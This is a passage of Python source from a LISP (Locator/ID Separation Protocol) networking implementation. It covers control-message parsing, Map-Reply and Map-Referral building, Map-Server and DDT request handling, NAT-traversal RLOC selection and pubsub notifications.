packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if (public and lisp_rtr_list.has_key(rtr)):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
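#
# Behavior sketch (editor's note, example values assumed): if the source and
# target sites both registered the same global RLOC, say 128.1.1.1, and the
# target's site-id is 0, only the target site's private RLOCs (e.g. 10.0.0.2)
# are returned; if the global RLOCs differ and the site-ids don't match, the
# full registered RLOC-set is returned unchanged.
#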
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
    # address in the rtr-list for the sole purpose of identifying the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
    #endfor
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
    # Check the case where an ETR included a local RLOC and may be behind
    # the same NAT as the requester. In this case, the requester can encap
    # directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
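#
# Behavior sketch (editor's note): when the registered RLOC-set contains a
# priority-254 entry (an RTR), the site is considered behind a NAT. If the
# Map-Request source is that RTR, the non-254 RLOCs are returned so the RTR
# can reach the ETRs directly; if an ITR is asking, the private RLOCs plus
# the RTR entries are returned instead.
#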
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
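#
# Transformation sketch (editor's note): the 4-byte header is rebuilt with the
# type field set to Map-Notify while keeping the record count, the 8-byte
# nonce is carried over unchanged, and 4 zero bytes (Key-ID, Alg-ID, and an
# Authentication Data Length of 0) are inserted before the EID-records.
#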
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
    # If the request is for a non-crypto-EID, signatures are configured to be
    # required, and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
        # We do not want to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
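    # One registered ETR is selected by hashing the source and destination
    # EIDs modulo the RLOC count, so repeated requests for the same EID pair
    # consistently land on the same ETR.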
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from a Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
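# For example, with eid 10.1.1.1 and entry_prefix 10.1.0.0 the XOR is
# 0x00000101; the first differing bit from the left is bit position 23, so the
# candidate negative-prefix mask-length is 23.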
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
